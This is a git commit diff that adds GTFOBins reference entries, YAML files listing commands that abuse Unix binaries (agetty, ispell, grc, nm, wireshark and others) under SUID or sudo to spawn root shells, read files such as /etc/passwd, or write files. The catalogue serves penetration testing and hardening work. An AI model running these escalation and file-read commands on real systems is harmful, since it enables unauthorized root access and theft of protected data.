Add nm file-read

Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>

_gtfobins/agetty.md

@@ -0,0 +1,5 @@
+---
+functions:
+  suid:
+    - code: ./agetty -o -p -l /bin/sh -a root tty
+---

_gtfobins/aspell.md

@@ -0,0 +1,16 @@
+---
+description: The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        aspell -c "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./aspell -c "$LFILE"
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo aspell -c "$LFILE"
+---

_gtfobins/grc.md

@@ -0,0 +1,7 @@
+---
+functions:
+  shell:
+    - code: grc --pty /bin/sh
+  sudo:
+    - code: sudo grc --pty /bin/sh
+---

_gtfobins/ispell.md

@@ -0,0 +1,15 @@
+---
+functions:
+  shell:
+    - code: |
+        ispell /etc/passwd
+        !/bin/sh
+  suid:
+    - code: |
+        ./ispell /etc/passwd
+        !/bin/sh -p
+  sudo:
+    - code: |
+        sudo ispell /etc/passwd
+        !/bin/sh
+---

_gtfobins/nm.md

@@ -0,0 +1,16 @@
+---
+description: The file content is treated as command line options and disclosed through error messages, so this is not suitable for reading arbitrary binary data.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        nm @$LFILE
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./nm @$LFILE
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo nm @$LFILE
+---

_gtfobins/ptx.md

@@ -0,0 +1,16 @@
+---
+description: While the program is capable of reading the file, it outputs a "permuted index" of its content, thus altering it. Adjusting the options could yield more readable outputs.
+functions:
+  file-read:
+    - code: |
+        LFILE=file_to_read
+        ptx -w 5000 "$LFILE"
+  suid:
+    - code: |
+        LFILE=file_to_read
+        ./ptx -w 5000 "$LFILE"
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo ptx -w 5000 "$LFILE"
+---

_gtfobins/sash.md

@@ -0,0 +1,9 @@
+---
+functions:
+  shell:
+    - code: sash
+  suid:
+    - code: ./sash
+  sudo:
+    - code: sudo sash
+---

_gtfobins/wall.md

@@ -0,0 +1,8 @@
+---
+description: The textual file is dumped on the current TTY (neither to `stdout` nor to `stderr`).
+functions:
+  sudo:
+    - code: |
+        LFILE=file_to_read
+        sudo wall --nobanner "$LFILE"
+---

_gtfobins/wireshark.md

@@ -0,0 +1,18 @@
+---
+functions:
+  sudo:
+    - description: |
+        This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.
+
+        After starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:
+
+        1. select the only received packet;
+
+        2. right-click on "Data" from the "Packet Details" pane, and select "Export Packet Bytes...";
+
+        3. choose where to save the packet dump.
+      code: |
+        PORT=4444
+        sudo wireshark -c 1 -i lo -k -f "udp port $PORT" &
+        echo 'DATA' | nc -u 127.127.127.127 "$PORT"
+---